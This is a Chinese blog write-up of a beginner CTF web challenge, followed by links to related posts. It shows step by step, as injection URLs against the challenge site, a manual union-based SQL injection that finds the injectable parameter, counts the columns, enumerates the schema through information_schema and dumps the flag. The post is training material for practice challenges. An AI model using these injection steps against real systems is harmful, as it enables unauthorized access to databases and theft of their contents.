CTF-Web26(涉及SQL注入--基础题)

最新推荐文章于 2024-06-05 11:24:39 发布
最新推荐文章于 2024-06-05 11:24:39 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: CTF-Web
原文链接:https://www.jianshu.com/p/7b0bcd454c44
版权

26.这个看起来有点简单!

分析:

这一道题很明显是一道SQL注入题,这里我们手工注入:

1、判断是否存在注入点

 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1

 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2

回显不同,说明存在注入点

2、猜字段数

 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2

 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3

字段数为2

3、查找数据库

 http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,database()

my_db才是我们要找的数据库

4、查找表

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=%27my_db%27

找到thiskey这个表

5、查看thiskey表中的列

 

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=%27my_db%27

发现k0y列

6、查看k0y列中的数据

http://ctf5.shiyanbar.com/8/index.php?id=1%20union%20select%201,k0y%20from%20thiskey

得到flag

这里我们也可以使用sqlmap工具进行注入,这里就不介绍了,自行测试。

 

红烧兔纸
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF基础
Mars_boom的博客
10-21 6562
web基础 了解webweb通过HTTP协议进行通信, 1、目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 目场景: http://220.249.52.133:48687/ 答案:按F12/fn+F12打开源代码,查看到flag 2、目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 目场景: http://220.249.52.133:36226 答案:关于robots协议,即爬虫协议,网站可以防止爬虫
南邮ctf mysql_南邮CTF--SQL注入
weixin_28692867的博客
02-01 155
南邮CTF--SQL注入目:GBK SQL injection解析:1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清目,GBK,接下来利用宽字节进行注入2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功3.继续改参数,1=2时,没有任何信息,找到注入点4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显...
ctfshow-web入门-爆破(web26-web28)
最新发布
Welcome To Myon'Blog !
06-05 1155
提取:\u606d\u559c\u60a8\uff0c\u60a8\u5df2\u88ab\u6211\u6821\u5f55\u53d6\uff0c\u4f60\u7684\u5b66\u53f7\u4e3a02015237 \u521d\u59cb\u5bc6\u7801\u4e3a\u8eab\u4efd\u8bc1\u53f7\u7801。可以注意到,这里的爆破位置恰好是身份证号的出生年月日的地方,年的话我们就从 1990 开始到 2024,月的话就是 00 到 12,日的话就是 01 到 31。
南邮CTF--SQL注入
weixin_34219944的博客
05-18 320
南邮CTF--SQL注入 目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清目,GBK,接下来利用宽字节进行注入 2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功 3.继续改参数,1=2时,没有任何信息,找到注入点 4.利用order by 查询列数,当查询2时,显...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库有哪些表; 五、查看表有哪些属性;
bugkuctf-WEB
05-04
总的来说,"bugkuctf-WEB"涉及的是Web安全的实战应用,需要对Web开发、网络安全有深入的理解,并具备问解决和创新思维能力。通过不断地学习和实践,我们可以不断提升自己的技能,与更多的人交流分享,共同进步...
信息安全TS-web学习资料
07-18
TS-web可能是一个特定的安全研究领域,专注于Web应用的技术安全问,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。 3. **学习资料**:这个压缩包包含的学习资料可能涵盖了Web安全的基础知识、进阶技术...
CTF-入门练习
10-30
2. **Web安全**:了解HTTP协议,学习SQL注入、XSS、CSRF等常见Web漏洞的原理和防范方法。 3. **逆向工程**:掌握反汇编语言,理解程序执行流程,查找和利用软件漏洞。 4. **操作系统安全**:学习权限提升、内核漏洞...
CTF web安全经典例讲解
10-22
综上所述,"CTF web安全经典例讲解"是一个全面覆盖Web安全关键领域的学习资源,包括SQL注入的检测与防御、密码学基础应用、文件上传漏洞的识别与修复、Web权限提升的防范以及抓包改包技巧的实践。对于希望在网络...
002-CTF web理论基础篇-第二课理论基础.pdf
07-09
CTF(Capture The Flag)是一种网络安全竞赛,其Web目主要涉及Web安全领域的知识和技巧。本篇将深入探讨CTF Web型的基础理论,帮助参赛者理解和掌握解的关键点。 1. 工具集: 在CTF Web挑战,通常会...
Android逆向CTF基础汇总
06-11
附件是八道Android基础逆向,基本都是CTF。平时网上基础CTF目比较难找,全靠平时慢慢积累起来的,后面有其他做过的CTF再贴出来分享给大家练手。
CTFshow-WEB入门-SQL注入(下)
feng的博客
02-11 2055
web227 按照上一的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。 看了一下y4师傅的WP,原来这考的是存储过程: 存储过程(Stored Procedure)是一种在数据库存储复杂程序,以便外部程序调用的一种数据库对象。 存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。 存储过程思想上很简单,就是数据库 SQL 语言层面
CTFshow 爆破 web26
Kradress的博客
10-28 592
EZ_trick 源码 <?php if (!isset($_POST['a'])&!isset($_POST['b'])&!isset($_GET['cmd'])) { show_source("index.php"); } $a=$_POST['a']; $b=$_POST['b']; if($b!==$a&sha1($a)===sha1($b)){ $cmd = $_GET['cmd']; if (!preg_match('/f
CTF web基础
m0_51426816的博客
01-10 522
BugkuCTF web2 要求输入验证码为两位数,但是长度限制为1位 直接更改长度限制,然后输入答案得到flag 攻防世界 web 新手练习区 get-post 在地址栏直接添加/?a=1 在火狐浏览器使用Hackbar(我用的是Max Hackbar),F12进入 提交得到flag ...
CTF-Web基础
weixin_52182264的博客
04-21 6529
CTF-Web基础
CTF--SQL注入
weixin_43882862的博客
08-13 429
靶场第1SQL注入 目 链接:http://59.63.200.79:8003/ 解思路 打开链接,发现是一个网站,里面有个点击新闻,尝试点开。。。。 点开以后,域名变为:http://59.63.200.79:8003/?id=1 怀疑是不是有数字型SQL注入呢? 构造payload试一试 使用hackbar构造payload and 1=1,发现回显成功。。 构造and 1=2,发现回显失败。。所以判定为数字型SQL注入。下面开始SQL联合注入。。。 第一步:判断字段数 构造paylo
ctf-web-sql注入
热门推荐
god_001的博客
05-03 1万+
目链接:跳转提示 打开网页,一个登陆页面,根据是本型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
CTF-SQL注入入门
PolarPeak的博客
12-14 5459
CTF SQL注入
CTF Web理论基础篇-第二课:工具集与php弱类型
在《002-CTF web理论基础篇-第二课理论基础.pdf》和《002-CTF web理论基础篇-第二课理论基础,我们学习了关于CTF网页型的理论基础知识。本文总结了这些知识,并提供了一些相关的工具集和理论基础内容。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值